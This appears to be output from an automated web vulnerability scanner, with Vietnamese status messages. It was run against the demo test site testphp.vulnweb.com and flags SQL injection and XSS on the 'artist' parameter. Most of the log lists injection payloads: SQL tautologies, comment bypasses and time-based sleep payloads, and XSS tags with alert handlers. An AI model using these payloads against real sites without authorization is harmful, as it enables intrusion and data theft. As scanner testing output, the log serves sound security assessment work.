[TIME] 2025-08-24 18:03:28
[URL] http://testphp.vulnweb.com/artists.php?artist=
[SUMMARY] SQLi, XSS
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://testphp.vulnweb.com/artists.php?artist=
[!] Có thể bị tấn công SQLi với các payloads:
    - ' OR '1'='1
    - " OR "1"="1
    - ') OR ('1'='1
    - " OR 1=1 --
    - ' OR 1=1#
    - " OR 1=1#
    - admin' --
    - 1' or '1' = '1
    - ' AND 1=1 --
    - ' AND 1=2 --
    - " AND 1=1 --
    - " AND 1=2 --
    - ') AND '1'='1
    - ') AND '1'='2
    - " OR "" = "
    - ' OR '' = '
    - '; WAITFOR DELAY '0:0:5' --
    - '; SELECT pg_sleep(5)--
    - " OR SLEEP(5) --
    - ') OR SLEEP(5) --
    - " OR 1=1; SLEEP(5) --
    - admin' OR SLEEP(3)--
    - 1); SELECT sleep(5);--


======= XSS =======
[*] Đang kiểm tra XSS trên: http://testphp.vulnweb.com/artists.php?artist=
[!] Có thể bị tấn công XSS với các payloads:
    - <img src="cat.webp" onmouseover="alert('meomeo')" width=100%/>
    - <details open ontoggle=alert(7)>
    - '><svg/onload=alert(3)>
    - <video src=1 onerror=alert(9)>
    - "><svg onmouseover=alert(4)>
    - "><img src=x onerror=alert(2)>
    - <iframe src="javascript:alert(5)">
    - <marquee onstart=alert(8)>
    - <script>alert(1)</script>
    - <math href="javascript:alert(6)">



======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://testphp.vulnweb.com/artists.php?artist=
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: http://testphp.vulnweb.com/artists.php?artist=
[!] Không tìm thấy form upload trên trang.

